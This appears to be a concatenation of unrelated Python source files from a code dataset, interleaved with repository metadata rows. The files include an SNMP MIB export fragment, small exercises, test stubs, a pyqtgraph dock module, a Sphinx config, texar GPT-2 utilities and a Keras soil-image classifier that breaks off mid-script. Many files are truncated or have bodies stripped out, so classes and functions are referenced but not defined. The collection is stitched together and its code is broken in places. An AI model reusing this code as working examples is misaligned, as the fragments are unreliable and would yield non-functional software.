zyAclV2ClassifierIPv6NextHeader=zyAclV2ClassifierIPv6NextHeader, zyAclV2ClassifierVlanMap4k=zyAclV2ClassifierVlanMap4k, zyAclV2ClassifierEthernet8021pPriority=zyAclV2ClassifierEthernet8021pPriority, zyxelAclV2TrapInfoObjects=zyxelAclV2TrapInfoObjects, zyxelAclV2ClassifierIpTable=zyxelAclV2ClassifierIpTable, zyAclV2ClassifierIPv6SourceIpAddress=zyAclV2ClassifierIPv6SourceIpAddress, zyxelAclV2ClassifierLoggingState=zyxelAclV2ClassifierLoggingState, zyxelAclV2=zyxelAclV2, zyxelAclV2ClassifierIpv6Table=zyxelAclV2ClassifierIpv6Table, zyAclV2PolicyDiffServAction=zyAclV2PolicyDiffServAction, zyAclV2ClassifierIpDestinationSocketRangeStart=zyAclV2ClassifierIpDestinationSocketRangeStart, zyAclV2ClassifierVlanMap1k=zyAclV2ClassifierVlanMap1k, zyAclV2PolicyDSCP=zyAclV2PolicyDSCP, zyxelAclV2ClassifierEthernetTable=zyxelAclV2ClassifierEthernetTable, zyAclV2ClassifierLogState=zyAclV2ClassifierLogState, zyAclV2ClassifierInnerVlanMap3k=zyAclV2ClassifierInnerVlanMap3k, zyAclV2ClassifierIPv6SourceIpPrefixLength=zyAclV2ClassifierIPv6SourceIpPrefixLength, zyAclV2PolicyBandwidth=zyAclV2PolicyBandwidth, zyxelAclV2ClassifierLoggingInterval=zyxelAclV2ClassifierLoggingInterval, zyAclV2Policy8021pPriority=zyAclV2Policy8021pPriority, zyAclV2PolicyForwardingAction=zyAclV2PolicyForwardingAction, zyAclV2PolicyName=zyAclV2PolicyName, PYSNMP_MODULE_ID=zyxelAclV2, zyAclV2ClassifierName=zyAclV2ClassifierName, zyAclV2ClassifierIPv6DestinationIpAddress=zyAclV2ClassifierIPv6DestinationIpAddress, zyAclV2ClassifierState=zyAclV2ClassifierState, zyxelAclV2ClassifierVlanEntry=zyxelAclV2ClassifierVlanEntry, zyAclV2PolicyState=zyAclV2PolicyState, zyAclV2ClassifierIpSourceIpAddress=zyAclV2ClassifierIpSourceIpAddress, zyxelAclV2ClassifierTable=zyxelAclV2ClassifierTable, zyxelAclV2ClassifierStatus=zyxelAclV2ClassifierStatus, zyAclV2ClassifierIpSourceSocketRangeEnd=zyAclV2ClassifierIpSourceSocketRangeEnd, zyAclV2PolicyTOS=zyAclV2PolicyTOS, zyAclV2ClassifierIpPacketLenRangeEnd=zyAclV2ClassifierIpPacketLenRangeEnd, zyxelAclV2PolicyEntry=zyxelAclV2PolicyEntry, zyAclV2ClassifierIpProtocol=zyAclV2ClassifierIpProtocol, zyxelAclV2ClassifierVlanTable=zyxelAclV2ClassifierVlanTable, zyAclV2PolicyOutOfProfileAction=zyAclV2PolicyOutOfProfileAction, zyAclV2ClassifierIpSourceSocketRangeStart=zyAclV2ClassifierIpSourceSocketRangeStart, zyAclV2ClassifierCountState=zyAclV2ClassifierCountState)
| 144.324742 | 5,641 | 0.792314 |
c76ca1375282328ef3e6038f93b1edf1d46d7f49 | 1,728 | py | Python | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | af/shovel/test_canning.py | mimi89999/pipeline | 3e9eaf74c0966df907a230fbe89407c2bbc3d930 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python2.7
import unittest
import canning
if __name__ == "__main__":
unittest.main()
| 30.315789 | 100 | 0.609375 |
c76d58f2d02929d5eb4690fddd86e4d2f3a6dc3d | 244 | py | Python | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | Exercicios/ex061.py | jlsmirandela/Curso_Python | 2419b68d335a2a42beb3e98fb93552aca1264cae | [
"MIT"
] | null | null | null | print('-+-' *10)
print(' GERADOR DE PA')
print('+-+' * 10)
c = 1
ter = int(input('Insira o primeiro termo - '))
rz = int(input('Insira a razo - '))
while c <= 10:
print(ter, ' ', end=' ')
ter += rz
c += 1
print('FIM')
| 14.352941 | 46 | 0.487705 |
c76e7fcaeb2193c977b2c4ee81febf00b7763cee | 2,175 | py | Python | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2019-09-30T06:51:03.000Z | 2019-09-30T06:51:03.000Z | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | null | null | null | gpytorch/models/approximate_gp.py | phumm/gpytorch | 4e8042bcecda049956f8f9e823d82ba6340766d5 | [
"MIT"
] | 1 | 2020-09-16T16:35:27.000Z | 2020-09-16T16:35:27.000Z | #!/usr/bin/env python3
from .gp import GP
from .pyro import _PyroMixin # This will only contain functions if Pyro is installed
| 38.157895 | 114 | 0.593563 |
c76ec369645b0f101be129ffedbb1f290be5f94b | 510 | py | Python | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 86 | 2015-11-25T07:09:10.000Z | 2022-02-15T19:40:30.000Z | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 180 | 2015-11-24T23:02:53.000Z | 2022-03-31T04:05:38.000Z | tests/test_ping.py | d-wysocki/flask-resty | 2a5e7d7ea7e2130dce44b8f50625df72ad0dcd19 | [
"MIT"
] | 17 | 2015-12-28T11:05:47.000Z | 2022-03-15T12:10:02.000Z | import pytest
from flask_resty import Api
from flask_resty.testing import assert_response
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def test_ping(base_client):
response = base_client.get("/ping")
assert_response(response, 200)
assert response.get_data(as_text=True) == ""
| 23.181818 | 79 | 0.490196 |
c76f8dffc967eba49049f65ff4df98887b137c0d | 1,476 | py | Python | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | tests/test_vetters.py | pllim/exovetter | 75c6ca609331c04a55c0a6b4c858be71a4dfdfea | [
"MIT",
"BSD-3-Clause"
] | null | null | null | from numpy.testing import assert_allclose
from astropy.io import ascii
from astropy import units as u
import lightkurve as lk
from exovetter import const as exo_const
from exovetter import vetters
from exovetter.tce import Tce
from astropy.utils.data import get_pkg_data_filename
| 25.894737 | 71 | 0.638889 |
c770f106a56c64793bd9f4e329f2b5bb1fbfddef | 4,270 | py | Python | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 2,762 | 2015-01-02T14:34:10.000Z | 2022-03-30T14:06:07.000Z | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 1,901 | 2015-01-12T03:20:30.000Z | 2022-03-31T16:33:36.000Z | pyqtgraph/dockarea/DockDrop.py | hishizuka/pyqtgraph | 4820625d93ffb41f324431d0d29b395cf91f339e | [
"MIT"
] | 1,038 | 2015-01-01T04:05:49.000Z | 2022-03-31T11:57:51.000Z | # -*- coding: utf-8 -*-
from ..Qt import QtCore, QtGui
| 32.348485 | 91 | 0.525527 |
c7723eb15222900f00b69a2e3a6fb1a9708b8d3e | 871 | py | Python | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | data/download.py | pyaf/google-ai-open-images-object-detection-track | 3dd19aeeca5eea07de341ade59d1513fda4597ee | [
"MIT"
] | null | null | null | import os
from subprocess import call
files = ['000002b66c9c498e.jpg', '000002b97e5471a0.jpg', '000002c707c9895e.jpg', '0000048549557964.jpg', '000004f4400f6ec5.jpg', '0000071d71a0a6f6.jpg', '000013ba71c12506.jpg', '000018acd19b4ad3.jpg', '00001bc2c4027449.jpg', '00001bcc92282a38.jpg', '0000201cd362f303.jpg', '000020780ccee28d.jpg', '000023aa04ab09ed.jpg', '0000253ea4ecbf19.jpg', '000025ea48cab6fc.jpg', '0000271195f2c007.jpg', '0000286a5c6a3eb5.jpg', '00002b368e91b947.jpg', '00002f4ff380c64c.jpg', '0000313e5dccf13b.jpg', '000032046c3f8371.jpg', '00003223e04e2e66.jpg', '0000333f08ced1cd.jpg']
for file in files:
if not os.path.exists('train/' + file + '.jpg'):
spath = "gs://open-images-dataset/train/%s " % file
call(["gsutil", "cp", spath, 'train/'])
print(file, 'done', 'count:')
else:
print(file, 'already downloaded')
| 67 | 560 | 0.712974 |
c773836d5d08ecba5ffb7e86e3b25bdc07e2351a | 3,927 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/SNMP_FRAMEWORK_MIB.py | bopopescu/ACI | dd717bc74739eeed4747b3ea9e36b239580df5e1 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-07-22T04:04:44.000Z | 2020-07-22T04:04:44.000Z | """ SNMP_FRAMEWORK_MIB
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
| 28.456522 | 158 | 0.595111 |
c773cb05d9fdb9aa7ea5543ac5440822be912b9e | 2,941 | py | Python | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | 6 | 2021-03-11T11:43:17.000Z | 2021-12-08T05:26:20.000Z | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | null | null | null | handlers/redirects.py | Bainky/Ventify | 638486dc5f265a4907a5a193ea2a7c9b44e8e943 | [
"MIT"
] | 2 | 2021-03-24T05:31:12.000Z | 2021-04-13T22:03:11.000Z | from aiogram.utils.markdown import hide_link
from aiogram.types import CallbackQuery
from loader import dp
from utils import (
get_object,
get_attributes_of_object
)
from keyboards import (
anime_choose_safe_category,
anime_sfw_categories,
anime_nsfw_categories,
animals_categories,
menu_with_categories,
control_buttons
)
| 23.717742 | 61 | 0.598776 |
c77456702d5939c9da605c3d65de2f70c1b95b26 | 8,695 | py | Python | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | segmentation_test/Scripts/medpy_graphcut_voxel.py | rominashirazi/SpineSegmentation | fb08122ac6d9a598b60aecb4f1a1a2a31fba96ab | [
"MIT"
] | null | null | null | #!c:\users\hooma\documents\github\spinesegmentation\segmentation_test\scripts\python.exe
"""
Execute a graph cut on a voxel image based on some foreground and background markers.
Copyright (C) 2013 Oskar Maier
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# build-in modules
from argparse import RawTextHelpFormatter
import argparse
import logging
import os
# third-party modules
import scipy
# path changes
# own modules
from medpy.core import ArgumentError, Logger
from medpy.io import load, save, header
from medpy import graphcut
from medpy.graphcut.wrapper import split_marker
# information
__author__ = "Oskar Maier"
__version__ = "r0.3.1, 2012-03-23"
__email__ = "oskar.maier@googlemail.com"
__status__ = "Release"
__description__ = """
Perform a binary graph cut using Boykov's max-flow/min-cut algorithm.
This implementation does only compute a boundary term and does not use
any regional term. The desired boundary term can be selected via the
--boundary argument. Depending on the selected term, an additional
image has to be supplied as badditional.
In the case of the difference of means, it is the original image.
Furthermore the algorithm requires a binary image with foreground
markers and a binary image with background markers.
Additionally a filename for the created binary mask marking foreground
and background has to be supplied.
Note that the input images must be of the same dimensionality,
otherwise an exception is thrown.
Note to take into account the input images orientation.
Note that the quality of the resulting segmentations depends also on
the quality of the supplied markers.
Copyright (C) 2013 Oskar Maier
This program comes with ABSOLUTELY NO WARRANTY; This is free software,
and you are welcome to redistribute it under certain conditions; see
the LICENSE file or <http://www.gnu.org/licenses/> for details.
"""
# code
def getArguments(parser):
"Provides additional validation of the arguments collected by argparse."
return parser.parse_args()
def getParser():
"Creates and returns the argparse parser object."
parser = argparse.ArgumentParser(description=__description__, formatter_class=RawTextHelpFormatter)
parser.add_argument('sigma', type=float, help='The sigma required for the boundary terms.')
parser.add_argument('badditional', help='The additional image required by the boundary term. See there for details.')
parser.add_argument('markers', help='Image containing the foreground (=1) and background (=2) markers.')
parser.add_argument('output', help='The output image containing the segmentation.')
parser.add_argument('--boundary', default='diff_exp', help='The boundary term to use. Note that the ones prefixed with diff_ require the original image, while the ones prefixed with max_ require the gradient image.', choices=['diff_linear', 'diff_exp', 'diff_div', 'diff_pow', 'max_linear', 'max_exp', 'max_div', 'max_pow'])
parser.add_argument('-s', dest='spacing', action='store_true', help='Set this flag to take the pixel spacing of the image into account. The spacing data will be extracted from the baddtional image.')
parser.add_argument('-f', dest='force', action='store_true', help='Set this flag to silently override files that exist.')
parser.add_argument('-v', dest='verbose', action='store_true', help='Display more information.')
parser.add_argument('-d', dest='debug', action='store_true', help='Display debug information.')
return parser
if __name__ == "__main__":
main() | 47.513661 | 328 | 0.692237 |
c774862e87bf8aaea6f4bb5796d15dd56dc9ae0b | 2,968 | py | Python | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | 1 | 2020-08-08T00:37:28.000Z | 2020-08-08T00:37:28.000Z | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | null | null | null | _notes/book/conf.py | AstroMatt/astronaut-training-en | 6250af8e10358016dcebee54bb9ad5bc40cfe4d1 | [
"MIT"
] | null | null | null | author = 'Matt Harasymczuk'
email = 'matt@astrotech.io'
project = 'Astronaut Training Program'
description = 'Astronaut Training Program'
extensions = [
'sphinx.ext.todo',
'sphinx.ext.imgmath',
]
todo_emit_warnings = False
todo_include_todos = True
exclude_patterns = []
# -----------------------------------------------------------------------------
# Standard book config
# -----------------------------------------------------------------------------
import os
import re
import subprocess
import sys
from datetime import datetime
needs_sphinx = '2.2'
mathjax_path = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML'
mathjax_config = {
'extensions': ['tex2jax.js'],
'jax': ['input/TeX', 'output/HTML-CSS'],
}
html_theme = 'sphinx_rtd_theme'
exclude_patterns = exclude_patterns + [
'.*',
'venv*',
'virtualenv*',
'_extensions',
'_img',
'_slides',
'_static',
'_themes',
'_tmp',
'*/_template.rst',
'*/contrib/*',
'*/solution/*',
'*/solutions/*',
'**.ipynb_checkpoints',
'README.rst',
'TODO.rst',
]
numfig_format = {
'section': 'Sect. %s.',
'figure': 'Fig. %s.',
'table': 'Tab. %s.',
'code-block': 'Code Listing %s.',
}
language = 'en'
source_directory = '.'
master_doc = 'index'
highlight_language = 'python3'
pygments_style = 'borland'
numfig = True
templates_path = ['_templates']
source_suffix = ['.rst']
imgmath_image_format = 'svg'
today_fmt = '%Y-%m-%d'
project_slug = re.sub(r'[\W]+', '', project)
sha1 = subprocess.Popen('git log -1 --format="%h"', stdout=subprocess.PIPE, shell=True).stdout.read().decode().replace('\n', '')
now = datetime.now()
year = now.year
today = now.strftime('%Y-%m-%d')
version = f'#{sha1}, {today}'
release = f'#{sha1}, {today}'
copyright = f'{year}, {author} <{email}>'
extensions_dir = os.path.join(os.path.dirname(__file__), '', '_extensions')
sys.path.append(extensions_dir)
htmlhelp_basename = project
html_theme_path = ['_themes']
html_static_path = ['_static']
html_favicon = '_static/favicon.png'
html_sidebars = {'sidebar': ['localtoc.html', 'sourcelink.html', 'searchbox.html']}
html_show_sphinx = False
html_context = {
'css_files': [
'_static/theme-overrides.css',
],
}
latex_documents = [(master_doc, f'{project_slug}.tex', project, author, 'manual')]
latex_elements = {
'papersize': 'a4paper',
'pointsize': '10pt',
'figure_align': 'htbp',
# Fix for: LaTeX Backend Fails with Citations In Figure Captions
'preamble': r"""
\usepackage{etoolbox}
\AtBeginEnvironment{figure}{\renewcommand{\phantomsection}{}}
"""
}
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
epub_exclude_files = ['search.html']
man_pages = [
(master_doc, project_slug, project, [author], 1)
]
texinfo_documents = [
(master_doc, project_slug, project, author, project, '', 'Miscellaneous'),
]
| 24.130081 | 128 | 0.624326 |
c774cc70f7362fd8daf5037ff3abf0db4ccef896 | 221 | py | Python | tutorial_application/forms.py | yamasakih/django_rdkit_tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | 2 | 2018-12-04T00:01:26.000Z | 2021-03-25T08:28:06.000Z | tutorial_application/forms.py | yamasakih/django-rdkit-tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | null | null | null | tutorial_application/forms.py | yamasakih/django-rdkit-tutorial | 9ac591963976da38cae962de2b98702bbb919cf4 | [
"MIT"
] | null | null | null | from django_rdkit import models
from django.forms.models import ModelForm
from .models import Compound
| 18.416667 | 41 | 0.723982 |
c775a30ea8b55f2cd0df98a3a7cc00417a074bda | 18,286 | py | Python | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | data_structures/trees/tree.py | onyonkaclifford/data-structures-and-algorithms | e0ca4bfa878273d06bf22c303e47762b8ec3870b | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import Any, Generator, Iterable, List, Union
def is_root(self, position: _Position) -> bool:
"""Check if the passed position contains the root node. Time complexity: O(1).
:returns: True if the passed position holds the root node, else False
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
return node.parent is None
def is_leaf(self, position: _Position) -> bool:
"""Check if the passed position contains a leaf. Time complexity: O(1).
:returns: True if the passed position holds a leaf node, else False
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
return len(self.get_children(position)) == 0
def get_root(self) -> Union[_Position, None]:
"""Return the root position. Time complexity: O(1).
:returns: the root position
"""
if self.is_empty():
return None
else:
return Tree._Position(self, self._root)
def get_parent(self, position: _Position) -> Union[_Position, None]:
"""Return the parent of the given position. Time complexity: O(1).
:param position: position containing the node whose parent is being sought
:returns: the position of parent of the node contained in the passed position. None if the position passed
contains the root node.
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
if self.is_root(Tree._Position(self, node)):
return None
else:
return Tree._Position(self, node.parent)
def get_children(self, position: _Position) -> Union[List[_Position], None]:
"""Return the children of the given position. Time complexity: O(1).
:param position: position containing the node whose children are being sought
:returns: the positions of the children of the node contained in the passed position. None if the position has
no children.
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
children = node.children
if children is None:
return None
else:
return [Tree._Position(self, i) for i in children if i is not None]
def get_siblings(self, position: _Position) -> Union[List[_Position], None]:
"""Return the siblings of the given position. Time complexity: O(1).
:param position: position containing the node whose children are being sought
:returns: the positions of the siblings of the node contained in the passed position
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
parent = node.parent
if parent is None:
return []
return [Tree._Position(self, i) for i in parent.children if i is not node]
def get_height_of_node(self, position: _Position) -> int:
"""Return the number of edges between a node and the farthest leaf among its descendants. Time complexity:
O(n).
:param position: position containing the node whose height is being sought
:returns: the number of edges between a node and the farthest leaf among its descendants
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
if self.is_leaf(position):
return 0
return 1 + max(self.get_height_of_node(p) for p in self.get_children(position))
def get_height_of_tree(self) -> int:
"""Return the number of edges between the root node and the farthest leaf. Time complexity: O(n).
:returns: the number of edges between the root node and the farthest leaf
"""
if self.is_empty():
raise Empty("Tree is empty")
return self.get_height_of_node(Tree._Position(self, self._root))
def get_depth_of_node(self, position: _Position) -> int:
"""Return the number of edges between a node and the root. Time complexity: O(n).
:param position: position containing the node whose depth is being sought
:returns: the number of edges between a node and the root
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
if self.is_root(position):
return 0
return 1 + self.get_depth_of_node(self.get_parent(position))
def get_depth_of_tree(self) -> int:
"""Return the number of edges between the farthest leaf and the root. Time complexity: O(n).
:returns: the number of edges between the farthest leaf and the root
"""
return self.get_height_of_tree()
def get_level_of_node(self, position: _Position) -> int:
"""Return the number of nodes between a node and the root, inclusive of itself. Time complexity: O(n).
:param position: position containing the node whose level is being sought
:returns: the number of nodes between a node and the root, inclusive of itself
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
return 1 + self.get_depth_of_node(position)
def traverse_subtree_pre_order(self, position: _Position) -> Generator:
"""Pre-order traverse subtree whose root is the passed position and return a generator of the positions it
contains
:param position: position containing the node that's the root of the subtree to be traversed
:returns: a generator of the positions
"""
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
yield position
for i in self.get_children(position):
for j in self.traverse_subtree_pre_order(i):
yield j
def delete(self, position: _Position) -> None:
"""Delete a value from the tree
:param position: position containing the node to be removed from the tree
"""
self._length -= 1
if not position.is_owned_by(self):
raise ValueError("Position doesn't belong to this tree")
node = position.manipulate_node(self, "_validate_node")
is_root_node = self.is_root(position)
_ = position.manipulate_variables(self, "_invalidate_position")
delete_node(node, is_root_node)
| 39.240343 | 119 | 0.626107 |
c775ae8fda6ca73f18c286d16c2c597ac2a87d30 | 6,857 | py | Python | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null | nodes/audio.py | sddhrthrt/COVFEFE | bc74ff0b5ee4d675482928110dda81443d4bec63 | [
"Apache-2.0"
] | null | null | null |
from abc import ABC, abstractmethod
import os
import logging
from nodes.helper import FileOutputNode
from utils import file_utils
from utils import signal_processing as sp
from utils.shell_run import shell_run
from config import OPENSMILE_HOME
| 36.865591 | 147 | 0.624763 |
c776010ff719981072eef5b7305ecf5eee272758 | 12,914 | py | Python | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | 19 | 2020-07-29T15:25:45.000Z | 2022-01-19T17:49:42.000Z | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | 3 | 2021-02-16T10:26:23.000Z | 2021-06-08T16:50:40.000Z | texar/torch/modules/pretrained/gpt2.py | VegB/VLN-Transformer | da1fa71e419d8d05c96749445230a77338edba09 | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Utils of GPT2 Modules.
"""
import json
import os
import warnings
from abc import ABC
from typing import Any, Dict
import torch
from texar.torch.modules.pretrained.pretrained_base import PretrainedMixin
__all__ = [
"PretrainedGPT2Mixin",
]
_GPT2_PATH = "https://storage.googleapis.com/gpt-2/models/"
_CHECKPOINT_FILES = [
"checkpoint", "encoder.json", "hparams.json", "vocab.bpe",
"model.ckpt.data-00000-of-00001", "model.ckpt.index", "model.ckpt.meta"]
| 40.73817 | 80 | 0.533065 |
c77641557884ec300d6f17e14694ed49328569cf | 4,930 | py | Python | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | Image classifier/train.py | anirudha-bs/Farm_assist | f824b7594befdb1132da2a5c03500a1885c6f036 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from keras import regularizers
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv2D, Flatten, Dropout, MaxPooling2D
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from keras.models import load_model
import numpy as np
from keras.preprocessing.image import img_to_array, load_img
from keras.preprocessing import image
import os
import numpy as np
import matplotlib.pyplot as plt
# defining classes
# Adding dataset paths
PATH = 'new_datasets'
train_dir = os.path.join(PATH, 'train')
validation_dir = os.path.join(PATH, 'validation')
test_dir = os.path.join(PATH, 'test')
train_red_dir = os.path.join(train_dir, 'Red_soil')
validation_red_dir = os.path.join(validation_dir, 'Red_soil')
train_black_dir = os.path.join(train_dir, 'Black_soil')
validation_black_dir = os.path.join(validation_dir, 'Black_soil')
train_all_dir = os.path.join(train_dir, 'Alluvial_soil')
validation_all_dir = os.path.join(validation_dir, 'Alluvial_soil')
num_soil_tr = len(os.listdir(train_red_dir)) + len(os.listdir(train_black_dir)) +len(os.listdir(train_all_dir))
num_soil_val = len(os.listdir(validation_red_dir)) + len(os.listdir(validation_black_dir)) + len((os.listdir(validation_all_dir)))
print("Total training images = ",num_soil_tr)
print("Total validation images = ",num_soil_val)
# hyperparameters
batch_size = 100
epochs = 15
IMG_HEIGHT = 128
IMG_WIDTH = 128
classes_num=3
# data generators
train_image_generator = ImageDataGenerator(rescale=1./255)
validation_image_generator = ImageDataGenerator(rescale=1./255)
train_data_gen = train_image_generator.flow_from_directory(batch_size=batch_size,
directory=train_dir,
shuffle=True,
target_size=(IMG_HEIGHT, IMG_WIDTH),
class_mode='categorical')
val_data_gen = validation_image_generator.flow_from_directory(batch_size=batch_size,
directory=validation_dir,
target_size=(IMG_HEIGHT, IMG_WIDTH),
shuffle=True,
class_mode='categorical')
# defining the model
model = Sequential([
Conv2D(16, 5, activation='relu', input_shape=(IMG_HEIGHT, IMG_WIDTH ,3)),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(32, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.2),
Conv2D(64, 5, activation='relu'),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.3),
Flatten(),
Dense(32, activation='relu'),
Dense(classes_num, activation='softmax')
])
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
model.summary()
history = model.fit_generator(
train_data_gen,
steps_per_epoch= num_soil_tr// batch_size,
epochs=epochs,
validation_data=val_data_gen,
validation_steps=num_soil_val // batch_size
)
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs_range = range(epochs)
# training and validation graphs
plt.figure(figsize=(8, 8))
plt.subplot(1, 2, 1)
plt.plot(epochs_range, acc, label='Training Accuracy')
plt.plot(epochs_range, val_acc, label='Validation Accuracy')
plt.legend(loc='lower right')
plt.title('Training and Validation Accuracy')
plt.subplot(1, 2, 2)
plt.plot(epochs_range, loss, label='Training Loss')
plt.plot(epochs_range, val_loss, label='Validation Loss')
plt.legend(loc='upper right')
plt.title('Training and Validation Loss')
plt.show()
model.save('new_soil_classify.h5')
# for testing trained model with images differnent class
image_path="red.jpg"
img = image.load_img(image_path, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img)
img = np.expand_dims(img, axis=0)
result=model.predict_classes(img)
plt.title(result[0])
plt.show()
image_path1="black.jpg"
img1 = image.load_img(image_path1, target_size=(IMG_HEIGHT, IMG_WIDTH))
plt.imshow(img1)
img1 = np.expand_dims(img1, axis=0)
